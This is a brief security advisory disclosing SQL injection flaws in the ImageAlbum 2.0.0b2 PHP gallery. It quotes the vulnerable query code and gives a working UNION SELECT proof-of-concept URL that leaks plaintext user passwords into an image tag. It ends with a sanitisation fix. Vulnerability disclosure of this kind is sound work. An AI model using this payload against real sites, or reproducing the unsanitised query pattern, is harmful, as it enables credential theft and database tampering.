Product: ImageAlbum
Version: Latest 2.0.0b2, others not tested
Vendor: http://imagealbum.sourceforge.net/
Date: 01/10/08
ImageAlbum is a web application written in PHP for displaying and editing
picture collections. It features user accounts and picture comments.
Multiple SQL injection vulnerabilities exist, that can result in user
credentials being compromised or the modification of the database.
In classes/IADomain.php
$sql = "SELECT * FROM `iaimage`
WHERE `id` = $id AND `domain_id` = $this->id LIMIT 1";
In classes/IACollection.php
$sql = "SELECT * FROM `iacollection` WHERE `id` = $this->id";
In classes/IAUser.php
$sql = "SELECT * FROM `iauser` WHERE `id` = $this->id";
Other SQL statements in the application are also vulnerable.
The following example exploits the image viewer page by placing the password
of a user into the src attribute of the img tag instead of the correct path
to the image. User passwords are stored in plain-text.
http://[site]/index.php/[domain]/?action=collection.imageview&id=643635
union all select iaimage.id, iaimage.name, description,
iaimage.collection_id, iaimage.domain_id, password As path, access,
visits, checked FROM iaimage, iauser WHERE iaimage.id=411 /*
Note, 643635 is an invalid image id and 411 is a known valid image id.
Edit the source code to insure that all user input is properly sanitised.
Cheers,
dB <dB [at] rawsecurity ! org>